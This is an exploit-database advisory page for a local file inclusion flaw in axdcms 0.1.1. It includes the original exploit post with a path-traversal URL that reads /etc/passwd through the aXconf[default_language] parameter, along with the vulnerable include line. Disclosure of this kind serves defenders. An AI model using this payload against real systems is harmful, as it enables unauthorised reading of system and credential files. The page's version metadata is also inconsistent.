header-logo
Suggest Exploit
vendor:
axdcms
by:
n0n0x
9.3
CVSS
HIGH
Local File Include
98
CWE
Product Name: axdcms
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:axdcms:axdcms:0.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

axdcms-0.1.1 Local File Include Vulnerbility

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'aXconf[default_language]' parameter to '/modules/profile/user.php' script. A remote attacker can include a file from local resources and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

###############################################
#          _______         _______           
#  _______ __  __ \_______ __  __ \____  __  
#  __  _  \_  / / /__  __ \_  / / /__  |/_/  
#  _  / / // /_/ / _  / / // /_/ / __>  <    
#  /_/ /_/ \____/  /_/ /_/ \____/  /_/|_|    
#
# priasantai.uni.cc    |    team-elite.us    
###############################################

#######################################################
#
#  axdcms-0.1.1 <=== Local File Include Vulnerbility
#
#######################################################
# Author : n0n0x
#
# Homepage: http://priasantai.uni.cc/
#
# Download script : http://biznetnetworks.dl.sourceforge.net/project/axdcms/axdcms/0.1.1/axdcms-0.1.1.zip
#######################################################


exploit :

http://localhost/www/axdcms-0.1.1/modules/profile/user.php?aXconf[default_language]=../../../../../../../../etc/passwd%00

c0de : 

include("modules/profile/lang/".$aXconf['default_language'].".php");


#######################################################
# Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org
#
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
#          devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
#
# chats : irc.auzs.net 6667-7000 #exploit-db
######################################################

Navigation

Suggest Exploit

Services By CQR